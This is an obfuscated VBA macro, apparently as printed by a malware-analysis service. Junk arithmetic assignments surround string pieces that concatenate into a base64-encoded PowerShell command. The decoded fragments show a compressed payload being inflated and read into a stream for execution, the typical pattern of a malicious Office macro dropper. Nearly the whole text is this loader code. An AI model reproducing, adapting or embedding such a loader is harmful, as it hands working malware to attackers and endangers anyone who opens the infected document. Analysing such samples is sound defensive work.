PiJmiOR = "gBqAGQAZgBTAHMA" + "TwB" + "KAE8AUwBQAGgA" + "bAA" + "2AGEAdgBKADAAQ" + "QBvADkA" + "YgBUAF" + "IAUA" + "B5AGUA" + "RgBtAE"
rCkEM = CLng(88291 * CSng(wcKWBk + ChrB(vwwVYX + CInt(25631))))
sXjjfo = Int(fKpcYw)
jZitk = zcSiN
AjvjP = rwJMX
OIPzAh = MjaQW
fmuuQF = Scnzkb
PCzKpmaZJ = "0AOAAyAFE" + "AVwBXAHcATgByAG" + "UASA" + "BoAC8AOQA5A" + "Hg"
PjwKT = CLng(4557 * CSng(ibDAc + ChrB(JBTZTY + CInt(92002))))
ZwDtHZ = Int(lVSMY)
JflQz = lALru
UoQJOi = fpqku
LdotG = nDdAVh
VDKkO = JFnlw
DFNwqUHRk = "AbQBvA" + "GMA" + "cgA4ADM" + "AVABMAE" + "cAZgBKAHkANAA2A" + "DEAQQBhAEo" + "AWABHAEkAWQBrA" + "CsANgBXADM"
GoAtSS = CLng(91228 * CSng(zmrwGE + ChrB(Gkrnu + CInt(54082))))
IIUFb = Int(kLXrrR)
wnJKh = pKjMNd
zDUvz = ABjrY
qQGnO = EpEKSb
FUmvYw = cRfhr
OQvcwbhF = "ATgBvAGMASgBkA" + "GsAcwA5A" + "GgAZwAwADAAaAAz" + "AFcANgAv" + "AEEAUQA9AD0A" + "JwAgACkAIAAsA" + "FsASQBPAC4AYw" + "BvAE0AcABSAGUA" + "cwBTAEkA"
tqQwQw = CLng(70421 * CSng(qJjWVM + ChrB(nFoks + CInt(29789))))
hNGHvS = Int(ZlZvmF)
YFuWq = OKCYDk
oMqwwM = ICsJB
NRXJb = GuOzuN
hiWLh = KUwNv
LvzPSdQj = "bwBu" + "AC4AYwBvAE0A" + "UABSAGUAUw" + "BzAEkAbwBOAE" + "0ATwBEAGUA" + "XQA6ADoA" + "ZABFAGM"
afhrdvF = RpAmNvHFFDp + PiJmiOR + PCzKpmaZJ + DFNwqUHRk + OQvcwbhF + LvzPSdQj
End Function
Function YjbEZkY()
On Error Resume Next
waEFVN = CLng(71388 * CSng(YUwns + ChrB(VdDaMv + CInt(67450))))
fXmrLF = Int(zREchi)
CosmJ = dMhjSk
hRVAzt = vjTdCf
aCrKLS = aOhZm
TSpDZa = IjvDd
cWcvZrzchDr = "ATwBNAFAAU" + "gBl" + "AHM" + "AUwApACAAfAAgA"
fNVVOk = CLng(57648 * CSng(DJpZG + ChrB(VGCob + CInt(24494))))
jcrPE = Int(IWtHnj)
mzFtT = IdQIAi
HBBdH = RlwkiF
JVqJC = skfWB
VmEYQ = rllTG
BCtFooUCO = "CUAIAB7AC" + "AAbgBlAF" + "cALQBPA" + "GIASgB" + "FA"
PzLPk = CLng(76696 * CSng(bnIfm + ChrB(GFwlib + CInt(60042))))
UmpMN = Int(PmTZpO)
tCqdz = HaWMHR
JOtACs = UvNVCX
zoTjq = SNCHH
kYawZi = bZAtTX
qCMClAdbuo = "GMAVAAgACAAS" + "QBPAC4AcwBUAFI" + "AZQBhAG0Acg" + "BFAE" + "EAZABFA" + "FIAK" + "AA" + "gAC" + "QAXwAgAC" + "wAIABbAHQAZQBY"
nAzpUa = CLng(53338 * CSng(HmCdRt + ChrB(wMlsS + CInt(15162))))
uzonH = Int(fwuAMt)
RPNnjH = QowwQB
coIaE = jGABjT
GIrBQY = CjwzL
KnFBr = FoCKl
bfnCNhZuWX = "AHQALgBlAE" + "4AQwBvAGQAaQBO" + "AEcAXQA6ADoAYQB" + "zAEMASQBJA" + "CAAKQB" + "9ACkALgBS"
IDBKP = CLng(23696 * CSng(NcqHw + ChrB(fstFvp + CInt(20760))))
tiwAw = Int(KNqDw)
cIUHs = mrwiU
JHMdMj = UaKPZ
JQCwz = mIpSWY
NiDTQK = Qrrzj
QIZZIiOjAu = "AGUAYQBk" + "AFQ" + "AbwBlAG4ARAAo" + "ACAAKQA="
YjbEZkY = cWcvZrzchDr + BCtFooUCO + qCMClAdbuo + bfnCNhZuWX + QIZZIiOjAu
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.